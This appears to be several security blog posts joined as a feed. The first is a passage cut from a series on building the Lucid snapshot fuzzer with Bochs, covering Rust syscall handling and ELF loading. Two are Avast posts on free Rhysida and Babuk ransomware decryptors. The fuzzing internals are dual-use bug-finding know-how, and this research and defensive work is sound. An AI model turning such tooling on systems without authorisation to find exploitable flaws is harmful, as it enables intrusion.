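    let iovec = unsafe { &*iovec_p };
    let base = iovec.iov_base as *const u8;
    let len = iovec.iov_len;

    // A NULL or zero-length iovec contributes nothing
    if base.is_null() || len == 0 {
        return 0;
    }

    // Build a byte slice over the guest buffer and print it as-is
    let bytes = unsafe { std::slice::from_raw_parts(base, len) };
    print!("{}", String::from_utf8_lossy(bytes));

    len
}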

That’s about it! It’s kind of fun acting as the kernel. Right now our test program doesn’t do much, but I bet we’re going to have to figure out how to deal with things like files when we’re using Bochs; that’s for another time, though. Now all there is to do, after setting the return code via rax, is return to the exit_handler stub and then back to Bochs gracefully.

Returning Gracefully

    // Restore the flags
    "popfq",

    // Restore the GPRS
    "mov rax, [r13 + 0x0]",
    "mov rbx, [r13 + 0x8]",
    "mov rcx, [r13 + 0x10]",
    "mov rdx, [r13 + 0x18]",
    "mov rsi, [r13 + 0x20]",
    "mov rdi, [r13 + 0x28]",
    "mov rbp, [r13 + 0x30]",
    "mov rsp, [r13 + 0x38]",
    "mov r8, [r13 + 0x40]",
    "mov r9, [r13 + 0x48]",
    "mov r10, [r13 + 0x50]",
    "mov r11, [r13 + 0x58]",
    "mov r12, [r13 + 0x60]",
    "mov r13, [r13 + 0x68]",
    "mov r14, [r13 + 0x70]",
    "mov r15, [r13 + 0x78]",

    // Return execution back to Bochs!
    "ret"

We restore the CPU flags, restore the general purpose registers, and then we simply ret as if we’re done with a normal function call. Don’t forget that we already restored the extended state within lucid_handler before returning from that function.

Conclusion

And just like that, we have an infrastructure that is capable of handling context switches from Bochs to the fuzzer. It will no doubt change and need to be refactored, but the ideas will remain similar. The output below shows the test program running under Lucid, with us handling the syscalls ourselves:

[08:15:56] lucid> Loading Bochs...
[08:15:56] lucid> Bochs mapping: 0x10000 - 0x18000
[08:15:56] lucid> Bochs mapping size: 0x8000
[08:15:56] lucid> Bochs stack: 0x7F8A50FCF000
[08:15:56] lucid> Bochs entry: 0x11058
[08:15:56] lucid> Creating Bochs execution context...
[08:15:56] lucid> Starting Bochs...
Argument count: 4
Args:
   -./bochs
   -lmfao
   -hahahah
   -yes!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0x55f27f693cd0
Unhandled Syscall Number: 0xE7

Next Up?

Next we will compile Bochs against Musl and work on getting it running. We’ll need to implement all of its syscalls, as well as get it running a test target that we’ll want to snapshot and run over and over. So the next blog post should show a syscall-sandboxed Bochs snapshotting and re-running a hello-world-type target. Until then!

Decrypted: Rhysida Ransomware

In October 2023, we published a blog post containing a technical analysis of the Rhysida ransomware. What we intentionally omitted in the blog post was that we had been aware of a cryptographic vulnerability in this ransomware for several months and, since August 2023, we had covertly provided victims with our decryption tool. Thanks to our collaboration with law enforcement units, we were able to quietly assist numerous organizations by decrypting their files for free, enabling them to regain functionality. Given that the weakness in the Rhysida ransomware was recently publicly disclosed, we are now publicly releasing our decryptor for download to all victims of the Rhysida ransomware.

The Rhysida ransomware has been active since May 2023. As of February 2024, their TOR site lists 78 attacked organizations, including those in the IT (Information Technology) sector, healthcare, universities, and government.

Usage of the Decryptor

Please, read the following instructions carefully. The rate of success depends on them.

Several parameters of the infected PC affect the encryption (and decryption) of the files:

  • Set of the drive letters
  • Order of files
  • Number of CPU cores
  • Bitness of the executed ransomware sample
  • Format of files before encryption

For these reasons, the following rules must be obeyed while decrypting files:

  • The decryptor must be executed on the same machine where the files were encrypted
  • Password cracking process must be executed on the same machine where the files were encrypted
  • No files from another machine can be copied to the machine where the decryption process is performed
  • Text files (source files, INI files, XML, HTML, …) must have a certain minimal size to be decryptable

64-bit samples of the Rhysida encryptor are far more common. For that reason, the default configuration of the decryptor assumes a 64-bit encryptor. If you are sure that it was the 32-bit version (for example, if you have a 32-bit operating system), the decryptor can be switched to 32-bit mode by using the following command line parameter:

avast_decryptor_rhysida.exe /ptr:32

If you want to verify whether the decryption process will work without changing the files, you may use the “testing mode” of the decryptor. This mode is activated by the following command line parameter:

avast_decryptor_rhysida.exe /nodecrypt

The Rhysida decryptor also relies on knowing the file format. Common file formats, such as Office documents, archives, pictures, and multimedia files, are already covered. If your encrypted data includes valuable documents in less common or proprietary formats, please contact us at [email protected]. We can analyze the file format and, if possible, add support for it to the decryptor.

Steps to Use the Decryptor

  1. Download the decryptor here.
  2. Run the decryptor. Unless you need one or more command line modifications, you can simply run it by clicking on the downloaded file.
  3. On the initial page, you must confirm that you are running the decryptor on the same PC where the files were encrypted. Click Yes, then the Next button when you are ready to start.
  4. Next page shows the list of drive letters on the PC. You may notice that it is in reverse order. Please, keep it as it is and click “Next.”
  5. The next screen requires you to enter an example of an encrypted file. In most cases, the decryptor picks the best file available for the password cracking process.
  6. The next page is where the password cracking process takes place. Click Start when you are ready to begin. This process usually only takes a few seconds but will require a large amount of system memory.
  7. Once the password is found, you can continue to decrypt all the encrypted files on your PC by clicking Next:
  8. On the final page, you can opt-in to back up your encrypted files. These backups may help if anything goes wrong during the decryption process. This choice is selected by default, which we recommend. After clicking Decrypt the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.

For questions or comments about the Avast decryptor, email [email protected].

The post Decrypted: Rhysida Ransomware appeared first on Avast Threat Labs.

Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police

Babuk, an advanced ransomware strain, was publicly discovered in 2021. Since then, Avast has blocked more than 5,600 targeted attacks, mostly in Brazil, Czech Republic, India, the United States, and Germany.

Today, in cooperation with Cisco Talos and Dutch Police, Avast is releasing an updated version of the Avast Babuk decryption tool, capable of restoring files encrypted by the Babuk variant called Tortilla. To download the tool, click here.

Babuk attacks blocked by Avast since 2021

Babuk Ransomware Decryptor 

In September 2021, the source code of the Babuk ransomware was released on a Russian-speaking hacking forum. The ZIP file also contained 14 private keys (one for each victim). Those keys were ECDH-25519 private keys needed for decryption of files encrypted by the Babuk ransomware. 

The Tortilla Campaign 

After a brief examination of the provided sample (originally named tortilla.exe), we found that the encryption schema had not changed since we analyzed Babuk samples two years ago. The process of extending the decryptor was therefore straightforward.

The Babuk encryptor was likely created from the leaked sources using the build tool. According to Cisco Talos, a single private key is used for all victims of the Tortilla threat actor. This makes the update to the decryptor especially useful, as all victims of the campaign can use it to decrypt their files. As with all Avast decryptors, the Babuk Ransomware Decryptor is available for free. 

Babuk victims can find out whether they were part of the Tortilla campaign by looking at the extension of the encrypted files and the ransom note file. Files encrypted by the ransomware have the .babyk extension as shown in the following example:

The ransom note file is called How To Restore Your Files.txt and is dropped to every directory. This is what the ransom note looks like:

Babuk victims can download the Babuk Decryptor for free: https://files.avast.com/files/decryptor/avast_decryptor_babuk.exe. It is also available within the NoMoreRansom project. 

We would like to thank Cisco Talos and the Dutch Police for the cooperation.

IOCs (indicators of compromise) 

bd26b65807026a70909d38c48f2a9e0f8730b1126e80ef078e29e10379722b49 (tortilla.exe) 

The post Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police appeared first on Avast Threat Labs.

Fuzzer Development 1: The Soul of a New Machine

By: h0mbre

Introduction && Credit to Gamozolabs

For a long time I’ve wanted to develop a fuzzer on the blog during my weekends and freetime, but for one reason or another, I could never really conceptualize a project that would be not only worthwhile as an educational tool, but also offer some utility to the fuzzing community in general. Recently, for Linux Kernel exploitation reasons, I’ve been very interested in Nyx. Nyx is a KVM-based hypervisor fuzzer that you can use to snapshot fuzz traditionally hard to fuzz targets. A lot of the time (most of the time?), we want to fuzz things that don’t naturally lend themselves well to traditional fuzzing approaches. When faced with target complexity in fuzzing (leaving input generation and nuance aside for now), there have generally been two approaches.

One approach is to lobotomize the target such that you can isolate a small subset of the target that you find “interesting” and only fuzz that. That can look like a lot of things, such as ripping a small portion of a Kernel subsystem out of the kernel and compiling it into a userland application that can be fuzzed with traditional fuzzing tools. This could also look like taking an input parsing routine out of a Web Browser and fuzzing just the parsing logic. This approach has its limits though; in an ideal world, we want to fuzz anything that may come in contact with or be affected by the artifacts of this “interesting” target logic. This lobotomy approach greatly reduces the amount of target state we can explore. Imagine if the hypothetical parsing routine successfully produces a data structure that is later consumed by separate target logic that actually reveals a bug. This fuzzing approach fails to explore that possibility.

Another approach is to effectively sandbox your target in such a way that you can exert some control over its execution environment and fuzz the target in its entirety. This is the approach that fuzzers like Nyx take. By snapshot fuzzing an entire Virtual Machine, we are able to fuzz complex targets such as a Web Browser or Kernel in a way that lets us explore much more state. Nyx provides us with a way to snapshot fuzz an entire Virtual Machine/system. This is, in my opinion, the ideal way to fuzz things because you are drastically closing the gap between a contrived fuzzing environment and how the target applications exist in the “real-world”. Now obviously there are tradeoffs here, one being the complexity of the fuzzing tooling itself. But I think, given the propensity of complex native code applications to harbor infinite bugs, the manual labor and complexity are worth it in order to increase the bug-finding potential of our fuzzing workflow.

And so, in my pursuit of understanding how Nyx works so that I could build a fuzzer on top of it, I revisited the stream paper review gamozolabs (Brandon Falk) did on the Nyx paper. It's a great stream; the Nyx authors were present in Twitch chat, so there were some good back and forths, and the stream really highlights what an amazing utility Nyx is for fuzzing. But something else besides Nyx piqued my interest during the stream! Gamozo described a fuzzing architecture he had previously built that utilized the Bochs emulator to snapshot fuzz complex targets and entire systems. This architecture sounded extremely interesting and clever to me, and coincidentally it had several attributes in common with a sandboxing utility I had been designing with a friend for fuzzing as well.

This fuzzing architecture seemed to meet several criteria that I personally value when it comes to doing a fuzzer development project on the blog:

  • it is relatively simple in its design,
  • it allows for almost endless introspection utilities to be added,
  • it lends itself well to iterative development cycles,
  • it can scale and be used on my servers I bought for fuzzing (but haven’t used yet because I don’t have a fuzzer!),
  • it can fuzz the Linux Kernel,
  • it can fuzz userland and kernel components on other OSes and platforms (Windows, MacOS),
  • it is pretty unique in its design compared to open source fuzzing tools that exist,
  • it can be designed from scratch to work well with existing flexible tooling such as LibAFL,
  • there is no source code available anywhere publicly, so I’m free to implement it from scratch the way I see fit,
  • it can be made to be portable, ie, there is nothing stopping us from running this fuzzer on Windows instead of just Linux,
  • it will allow me to do a lot of learning and low-level computing research and learning.

So all things considered, this seemed like the ideal project to implement on the blog, so I reached out to Gamozo to make sure he'd be ok with it, as I didn't want to be seen as clout chasing off of his ideas. He was very charitable and encouraged me to do it. So huge thanks to Gamozo for sharing so much content, and we're off to developing the fuzzer.

Also huge shoutout to @is_eqv and @ms_s3c, at least two of the Nyx authors, who are always super friendly and charitable with their time and with answering questions. Some great people to have around.

Another huge shoutout to @Kharosx0 for helping me understand Bochs and for answering all my questions about my design intentions, another very charitable person who is always helping out on the Fuzzing discord.

Misc

Please let me know if you find any programming errors or have some nitpicks with the code. I’ve tried to heavily comment everything, and given that I cobbled this together over the course of a couple of weekends, there are probably some issues with the code. I also haven’t really fleshed out how the repository will look, or what files will be called, or anything like that so please be patient with the code-quality. This is mostly for learning purposes and at this point it is just a proof-of-concept of loading Bochs into memory to explain the first portion of the architecture.

I’ve decided to name the project “Lucid” for now, as reference to lucid dreaming since our fuzz target is in somewhat of a dream state being executed within a simulator.

Bochs

What is Bochs? Good question. Bochs is an x86 full-system emulator capable of running an entire operating system with software-simulated hardware devices. In short, it's a JIT-less, smaller, less-complex emulation tool similar to QEMU but with far fewer use-cases and far lower performance. Instead of taking QEMU's approach of “let's emulate anything and everything and do it with good performance”, Bochs has taken the approach of “let's emulate an entire x86 system 100% in software without worrying about performance for the most part”. This approach has its obvious drawbacks, but if you are only interested in running x86 systems, Bochs is a great utility. We are going to use Bochs as the target execution engine in our fuzzer. Our target code will run inside Bochs. So if we are fuzzing the Linux Kernel for instance, that kernel will live and execute inside Bochs. Bochs is written in C++ and apparently still maintained, but do not expect many code changes or rapid development; the last release was over 2 years ago.

Fuzzer Architecture

This is where we discuss how the fuzzer will be designed according to the information laid out on stream by Gamozo. In simple terms, we will create a “fuzzer” process, which will execute Bochs, which in turn is executing our fuzz target. Instead of snapshotting and restoring our target each fuzzing iteration, we will reset Bochs which contains the target and all of the target system’s simulated state. By snapshotting and restoring Bochs, we are snapshotting and restoring our target.

Going a bit deeper, this setup requires us to sandbox Bochs and run it inside of our “fuzzer” process. In an effort to isolate Bochs from the user's OS and Kernel, we will sandbox Bochs so that it cannot interact with our operating system. This allows us to achieve a few things, but chiefly this should make Bochs deterministic. As Gamozo explains on stream, isolating Bochs from the operating system prevents Bochs from accessing any random or quasi-random data sources. This means that we will prevent Bochs from making syscalls into the kernel as well as executing any instructions that retrieve hardware-sourced data such as CPUID or something similar. I actually haven't given much thought to the latter yet, but syscalls I have a plan for. With Bochs isolated from the operating system, we can expect it to behave the same way each fuzzing iteration. Given Fuzzing Input A, Bochs should execute exactly the same way for 1 trillion successive iterations.

Secondly, it also means that the entirety of Bochs’ state will be contained within our sandbox, which should enable us to reset Bochs’ state more easily instead of it being a remote process. In a paradigm where Bochs executes as intended as a normal Linux process for example, resetting its state is not trivial and may require a heavy handed approach such as page table walking in the kernel for each fuzzing iteration or something even worse.

So in general, this is how our fuzzing setup should look: Fuzzer Architecture

In order to provide a sandboxed environment, we must load an executable Bochs image into our own fuzzer process. So for this, I’ve chosen to build Bochs as an ELF and then load the ELF into my fuzzer process in memory. Let’s dive into how that has been accomplished thus far.

Loading an ELF in Memory

So in order to keep this portion, loading Bochs in memory, as simple as possible, I've chosen to compile Bochs as a -static-pie ELF. This means that the built ELF has no expectations about where it is loaded. In its _start routine, it actually has all of the logic of the normal OS ELF loader necessary to perform all of its own relocations. How cool is that? But before we get too far ahead of ourselves, the first goal will just be to simply build and load a -static-pie test program and make sure we can do that correctly.

In order to make sure we have everything correctly implemented, we’ll make sure that the test program can correctly access any command line arguments we pass and can execute and exit.

#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    printf("Argument count: %d\n", argc);
    printf("Args:\n");
    for (int i = 0; i < argc; i++) {
        printf("   -%s\n", argv[i]);
    }

    size_t iters = 0;
    while (1) {
        printf("Test alive!\n");
        sleep(1);
        iters++;

        if (iters > 5) { return 0; }
    }
}

Remember, at this point we don't sandbox our loaded program at all; all we're trying to do is load it into our fuzzer's virtual address space, jump to it, and make sure the stack and everything else is correctly set up. So we could run into issues that aren't real issues if we jump straight into executing Bochs at this point.

So compiling the test program and examining it with readelf -l, we can see that there is actually a DYNAMIC segment. Likely because of the relocations that need to be performed during the aforementioned _start routine.

dude@lol:~/lucid$ gcc test.c -o test -static-pie
dude@lol:~/lucid$ file test
test: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, BuildID[sha1]=6fca6026edb756fa32c966844b29529d579e83b9, for GNU/Linux 3.2.0, not stripped
dude@lol:~/lucid$ readelf -l test

Elf file type is DYN (Shared object file)
Entry point 0x9f50
There are 12 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000
  DYNAMIC        0x00000000000c9c18 0x00000000000cac18 0x00000000000cac18
                 0x00000000000001b0 0x00000000000001b0  RW     0x8
  NOTE           0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  NOTE           0x0000000000000300 0x0000000000000300 0x0000000000000300
                 0x0000000000000044 0x0000000000000044  R      0x4
  TLS            0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000000020 0x0000000000000060  R      0x8
  GNU_PROPERTY   0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  GNU_EH_FRAME   0x00000000000ba110 0x00000000000ba110 0x00000000000ba110
                 0x0000000000001cbc 0x0000000000001cbc  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000003220 0x0000000000003220  R      0x1

 Section to Segment mapping:
  Segment Sections...
   00     .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .rela.dyn .rela.plt 
   01     .init .plt .plt.got .plt.sec .text __libc_freeres_fn .fini 
   02     .rodata .stapsdt.base .eh_frame_hdr .eh_frame .gcc_except_table 
   03     .tdata .init_array .fini_array .data.rel.ro .dynamic .got .data __libc_subfreeres __libc_IO_vtables __libc_atexit .bss __libc_freeres_ptrs 
   04     .dynamic 
   05     .note.gnu.property 
   06     .note.gnu.build-id .note.ABI-tag 
   07     .tdata .tbss 
   08     .note.gnu.property 
   09     .eh_frame_hdr 
   10     
   11     .tdata .init_array .fini_array .data.rel.ro .dynamic .got

So what portions of this ELF image do we actually care about for our loading purposes? We probably don't need most of this information to simply get the ELF loaded and running. At first, I didn't know what I needed, so I just parsed all of the ELF headers.

Keeping in mind that this ELF parsing code doesn’t need to be robust, because we are only using it to parse and load our own executable, I simply made sure that there were no glaring issues in the built executable when parsing the various headers.

ELF Headers

I’ve written ELF parsing code before, but didn’t really remember how it worked so I had to relearn everything from Wikipedia: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format. Luckily, we’re not trying to parse an arbitrary ELF, just a 64-bit ELF that we built ourselves. The goal is to create a data-structure out of the ELF header information that gives us the data we need to load the ELF in memory. So I skipped some of the ELF header values but ended up parsing the ELF header into the following data structure:

// Constituent parts of the Elf
#[derive(Debug)]
pub struct ElfHeader {
    pub entry: u64,
    pub phoff: u64,
    pub shoff: u64,
    pub phentsize: u16,
    pub phnum: u16,
    pub shentsize: u16,
    pub shnum: u16,
    pub shrstrndx: u16,
}

We really care about a few of these struct members. For one, we definitely need to know the entry, this is where you’re supposed to start executing from. So eventually, our code will jump to this address to start executing the test program. We also care about phoff. This is the offset into the ELF where we can find the base of the Program Header table. This is just an array of Program Headers basically. Along with phoff, we also need to know the number of entries in that array and the size of each entry so that we can parse them. That is where phnum and phentsize come in handy respectively. Given the offset of index 0 in the array, the number of array members, and the size of each member, we can parse the Program Headers.
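
For illustration, here's a minimal sketch of how the ElfHeader struct above could be filled in from the raw file bytes using the standard ELF64 field offsets. This is just the idea, not necessarily the exact parse code in the repo; read_u16 and read_u64 are little helpers I'm assuming here:

fn read_u16(data: &[u8], off: usize) -> u16 {
    u16::from_le_bytes(data[off..off + 2].try_into().unwrap())
}

fn read_u64(data: &[u8], off: usize) -> u64 {
    u64::from_le_bytes(data[off..off + 8].try_into().unwrap())
}

// Parse the 64-byte ELF64 header using the standard field offsets
// (e_entry at 0x18, e_phoff at 0x20, e_shoff at 0x28, and so on)
fn parse_elf_header(data: &[u8]) -> ElfHeader {
    ElfHeader {
        entry:     read_u64(data, 0x18),
        phoff:     read_u64(data, 0x20),
        shoff:     read_u64(data, 0x28),
        phentsize: read_u16(data, 0x36),
        phnum:     read_u16(data, 0x38),
        shentsize: read_u16(data, 0x3A),
        shnum:     read_u16(data, 0x3C),
        shrstrndx: read_u16(data, 0x3E),
    }
}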

A single program header, ie, a single entry in the array, can be synthesized into the following data structure:

#[derive(Debug)]
pub struct ProgramHeader {
    pub typ: u32,
    pub flags: u32,
    pub offset: u64,
    pub vaddr: u64,
    pub paddr: u64,
    pub filesz: u64,
    pub memsz: u64,
    pub align: u64, 
}

These program headers describe segments in the ELF image as it should exist in memory. In particular, we care about the loadable segments with type LOAD, as these segments are the ones we have to account for when loading the ELF image. Take our readelf output for example:

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000

We can see that there are 4 loadable segments. They also have several attributes we need to be keeping track of:

  • Flags describes the memory permissions this segment should have; we have 3 distinct memory protection schemes: READ, READ | EXECUTE, and READ | WRITE
  • Offset describes how far into the physical file contents we can expect to find this segment
  • PhysAddr we don’t much care about
  • VirtAddr is the virtual address this segment should be loaded at; you can tell that the first segment's value for this is 0x0000000000000000, which means that it has no expectations about where it's to be loaded.
  • MemSiz how large the segment should be in virtual memory
  • Align how to align the segments in virtual memory

For our very simplistic use-case of only loading a -static-pie ELF that we ourselves create, we can basically ignore all the other portions of the parsed ELF.
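
Before moving on, here's a rough sketch of how one of these 56-byte ELF64 program header entries could be parsed (again, not necessarily the repo's exact code, and reusing the read helpers from the header sketch above); the is_load() check used later just compares the type against PT_LOAD:

const PT_LOAD: u32 = 1;

fn read_u32(data: &[u8], off: usize) -> u32 {
    u32::from_le_bytes(data[off..off + 4].try_into().unwrap())
}

// `base` is the file offset of this entry:
// elf_header.phoff + (index * elf_header.phentsize)
fn parse_program_header(data: &[u8], base: usize) -> ProgramHeader {
    ProgramHeader {
        typ:    read_u32(data, base + 0x00),
        flags:  read_u32(data, base + 0x04),
        offset: read_u64(data, base + 0x08),
        vaddr:  read_u64(data, base + 0x10),
        paddr:  read_u64(data, base + 0x18),
        filesz: read_u64(data, base + 0x20),
        memsz:  read_u64(data, base + 0x28),
        align:  read_u64(data, base + 0x30),
    }
}

impl ProgramHeader {
    // Loadable segments are the only ones we have to map into memory
    pub fn is_load(&self) -> bool {
        self.typ == PT_LOAD
    }
}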

Loading the ELF

Now that we’ve successfully parsed out the relevant attributes of the ELF file, we can create an executable image in memory. For now, I’ve chosen to only implement what’s needed in a Linux environment, but there’s no reason why we couldn’t load this ELF into our memory if we happened to be a Windows userland process. That’s kind of why this whole design is cool. At some point, maybe someone will want Windows support and we’ll add it.

The first thing we need to do is calculate the size of the virtual memory that we need in order to load the ELF, based on the combined size of the segments that are marked LOAD. We also have to keep in mind that there is some padding after segments whose sizes aren't page aligned, so to do this, I used the following logic:

// Read the executable file into memory
let data = read(BOCHS_IMAGE).map_err(|_| LucidErr::from(
    "Unable to read binary data from Bochs binary"))?;

// Parse ELF 
let elf = parse_elf(&data)?;

// We need to iterate through all of the loadable program headers and 
// determine the size of the address range we need
let mut mapping_size: usize = 0;
for ph in elf.program_headers.iter() {
    if ph.is_load() {
        let end_addr = (ph.vaddr + ph.memsz) as usize;
        if mapping_size < end_addr { mapping_size = end_addr; }
    }
}

// Round the mapping up to a page
if mapping_size % PAGE_SIZE > 0 {
    mapping_size += PAGE_SIZE - (mapping_size % PAGE_SIZE);
}

We iterate through all of the Program Headers in the parsed ELF, and we just see where the largest “end_addr” is. This accounts for the page-aligning padding in between segments as well. And as you can see, we also page-align the last segment as well by making sure that the size is rounded up to the nearest page. At this point we know how much memory we need to mmap to hold the loadable ELF segments. We mmap a contiguous range of memory here:

// Call `mmap` to map memory into our process to hold all of the loadable 
// program header contents in a contiguous range. Right now the perms will be
// generic across the entire range as PROT_WRITE,
// later we'll go back and `mprotect` them appropriately
fn initial_mmap(size: usize) -> Result<usize, LucidErr> {
    // We don't want to specify a fixed address
    let addr = LOAD_TARGET as *mut libc::c_void;

    // Length is straight forward
    let length = size as libc::size_t;

    // Set the protections for now to writable
    let prot = libc::PROT_WRITE;

    // Set the flags, this is anonymous memory
    let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;

    // We don't have a file to map, so this is -1
    let fd = -1 as libc::c_int;

    // We don't specify an offset 
    let offset = 0 as libc::off_t;

    // Call `mmap` and make sure it succeeds
    let result = unsafe {
        libc::mmap(
            addr,
            length,
            prot,
            flags,
            fd,
            offset
        )
    };

    if result == libc::MAP_FAILED {
        return Err(LucidErr::from("Failed to `mmap` memory for Bochs"));
    }

    Ok(result as usize)
}

So now we have carved out enough memory to write the loadable segments to. The segment data is sourced from the file of course, and so the first thing we do is once again iterate through the Program Headers and extract all the relevant data we need to do a memcpy from the file data in memory, to the carved out memory we just created. You can see that logic here:

let mut load_segments = Vec::new();
    for ph in elf.program_headers.iter() {
        if ph.is_load() {
            load_segments.push((
                ph.flags,               // segment.0
                ph.vaddr    as usize,   // segment.1
                ph.memsz    as usize,   // segment.2
                ph.offset   as usize,   // segment.3
                ph.filesz   as usize,   // segment.4
            ));
        }
    }

After the segment metadata has been extracted, we can copy the contents over as well as call mprotect on the segment in memory so that its permissions perfectly match the Flags segment metadata we discussed earlier. That logic is here:

// Iterate through the loadable segments and change their perms and then 
// copy the data over
for segment in load_segments.iter() {
    // Copy the binary data over, the destination is where in our process
    // memory we're copying the binary data to. The source is where we copy
    // from, this is going to be an offset into the binary data in the file,
    // len is going to be how much binary data is in the file, that's filesz 
    // This is going to be unsafe no matter what
    let len = segment.4;
    let dst = (addr + segment.1) as *mut u8;
    let src = (elf.data[segment.3..segment.3 + len]).as_ptr();

    unsafe {
        std::ptr::copy_nonoverlapping(src, dst, len);
    }

    // Calculate the `mprotect` address by adding the mmap address plus the
    // virtual address offset, we also mask off the last 0x1000 bytes so 
    // that we are always page-aligned as required by `mprotect`
    let mprotect_addr = ((addr + segment.1) & !(PAGE_SIZE - 1))
        as *mut libc::c_void;

    // Get the length
    let mprotect_len = segment.2 as libc::size_t;

    // Get the protection
    let mut mprotect_prot = 0 as libc::c_int;
    if segment.0 & 0x1 == 0x1 { mprotect_prot |= libc::PROT_EXEC; }
    if segment.0 & 0x2 == 0x2 { mprotect_prot |= libc::PROT_WRITE; }
    if segment.0 & 0x4 == 0x4 { mprotect_prot |= libc::PROT_READ; }

    // Call `mprotect` to change the mapping perms
    let result = unsafe {
        libc::mprotect(
            mprotect_addr,
            mprotect_len,
            mprotect_prot
        )
    };

    if result < 0 {
        return Err(LucidErr::from("Failed to `mprotect` memory for Bochs"));
    }
}

After that is successful, our ELF image is basically complete. We can just jump to it and start executing! Just kidding, we have to first setup a stack for the new “process” which I learned was a huge pain.

Setting Up a Stack for Bochs

I spent a lot of time on this and there actually might still be bugs! This was the hardest part I’d say as everything else was pretty much straightforward. To complete this part, I heavily leaned on this resource which describes how x86 32-bit application stacks are fabricated: https://articles.manugarg.com/aboutelfauxiliaryvectors.

Here is an extremely useful diagram describing the 32-bit stack cribbed from the linked resource above:

position            content                     size (bytes) + comment
  ------------------------------------------------------------------------
  stack pointer ->  [ argc = number of args ]     4
                    [ argv[0] (pointer) ]         4   (program name)
                    [ argv[1] (pointer) ]         4
                    [ argv[..] (pointer) ]        4 * x
                    [ argv[n - 1] (pointer) ]     4
                    [ argv[n] (pointer) ]         4   (= NULL)

                    [ envp[0] (pointer) ]         4
                    [ envp[1] (pointer) ]         4
                    [ envp[..] (pointer) ]        4
                    [ envp[term] (pointer) ]      4   (= NULL)

                    [ auxv[0] (Elf32_auxv_t) ]    8
                    [ auxv[1] (Elf32_auxv_t) ]    8
                    [ auxv[..] (Elf32_auxv_t) ]   8
                    [ auxv[term] (Elf32_auxv_t) ] 8   (= AT_NULL vector)

                    [ padding ]                   0 - 16

                    [ argument ASCIIZ strings ]   >= 0
                    [ environment ASCIIZ str. ]   >= 0

  (0xbffffffc)      [ end marker ]                4   (= NULL)

  (0xc0000000)      < bottom of stack >           0   (virtual)
  ------------------------------------------------------------------------

When we pass arguments to a process on the command line like ls / -laht, the Linux OS has to load the ls ELF into memory and create its environment. In this example, we passed a couple argument values to the process as well / and -laht. The way that the OS passes these arguments to the process is on the stack via the argument vector or argv for short, which is an array of string pointers. The number of arguments is represented by the argument count or argc. The first member of argv is usually the name of the executable that was passed on the command line, so in our example it would be ls. As you can see the first thing on the stack, the top of the stack, which is at the lower end of the address range of the stack, is argc, followed by all the pointers to string data representing the program arguments. It is also important to note that the array is NULL terminated at the end.

After that, we have a similar data structure with the envp array, which is an array of pointers to string data representing environment variables. You can retrieve this data yourself by running a program under GDB and using the command show environment, the environment variables are usually in the form “KEY=VALUE”, for instance on my machine the key-value pair for the language environment variable is "LANG=en_US.UTF-8". For our purposes, we can ignore the environment variables. This vector is also NULL terminated.

Next, is the auxiliary vector, which is extremely important to us. This information details several aspects of the program. These auxiliary entries in the vector are 16-bytes a piece. They comprise a key and a value just like our environment variable entries, but these are basically u64 values. For the test program, we can actually dump the auxiliary information by using info aux under GDB.

gef➤  info aux
33   AT_SYSINFO_EHDR      System-supplied DSO's ELF header 0x7ffff7f2e000
51   ???                                                 0xe30
16   AT_HWCAP             Machine-dependent CPU capability hints 0x1f8bfbff
6    AT_PAGESZ            System page size               4096
17   AT_CLKTCK            Frequency of times()           100
3    AT_PHDR              Program headers for program    0x7ffff7f30040
4    AT_PHENT             Size of program header entry   56
5    AT_PHNUM             Number of program headers      12
7    AT_BASE              Base address of interpreter    0x0
8    AT_FLAGS             Flags                          0x0
9    AT_ENTRY             Entry point of program         0x7ffff7f39f50
11   AT_UID               Real user ID                   1000
12   AT_EUID              Effective user ID              1000
13   AT_GID               Real group ID                  1000
14   AT_EGID              Effective group ID             1000
23   AT_SECURE            Boolean, was exec setuid-like? 0
25   AT_RANDOM            Address of 16 random bytes     0x7fffffffe3b9
26   AT_HWCAP2            Extension of AT_HWCAP          0x2
31   AT_EXECFN            File name of executable        0x7fffffffefe2 "/home/dude/lucid/test"
15   AT_PLATFORM          String identifying platform    0x7fffffffe3c9 "x86_64"
0    AT_NULL              End of vector                  0x0

